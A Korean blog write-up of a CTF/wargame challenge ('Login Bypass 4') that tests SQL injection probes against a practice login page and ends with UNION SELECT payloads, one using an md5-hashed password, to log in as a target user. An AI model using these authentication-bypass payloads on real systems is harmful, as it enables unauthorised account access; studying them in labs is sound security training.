[SegFault] (Authentication Bypass)

Wargame & CTF/SegFault

[SegFault] (Authentication Bypass) - Login Bypass 4

Gearvirus(junyup2) 2023. 12. 6. 04:01

[SegFault] Authentication Bypass (Login)

Login Bypass 4.

normaltic4 로 로그인하자!

문제파악

위의 페이지에 접속하면 아래와 같은 화면이 나온다.

알고 있는 계정 : [ID/PW] : doldol / dol1234

해당 계정으로 로그인하여 확인해본다.

로그인 과정의 구조를 알기 위해, 알고 있는 정보로 로그인 해본다.

생각과정

1. SQL Injection이 가능한가? Yes
-> doldol'and'1'='1 / dol1234로 로그인 시도 : 성공
2. 어떤 로직으로 이루어져 있을까?
2-1. 식별/인증 동시
normaltic3'or'1'='1 시도 : 실패(Fail)
2-2. or 필터링
normaltic'# / dol1234 시도 : 실패
2-3 식별/인증 분리
'union select 'normaltic4','dol1234'# / dol1234 : 실패
2-4 식별/인증 분리 + HASH
'union select 'normaltic4',md5('dol1234')# / dol1234

풀이과정 (해결 방안)

질문 환영, 수정 및 보완에 대한 지적 환영

저작자표시

현재글[SegFault] (Authentication Bypass) - Login Bypass 4

📓 Codegear_Archive

[SegFault] (Authentication Bypass) - Login Bypass 4

[SegFault] Authentication Bypass (Login)

Login Bypass 4.

문제파악

생각과정

풀이과정 (해결 방안)

'Wargame & CTF/SegFault'의 다른글

티스토리툴바

[SegFault] (Authentication Bypass) - Login Bypass 4

[SegFault] Authentication Bypass (Login)

Login Bypass 4.

문제파악

생각과정

풀이과정 (해결 방안)

'Wargame & CTF/SegFault'의 다른글

관련글

티스토리툴바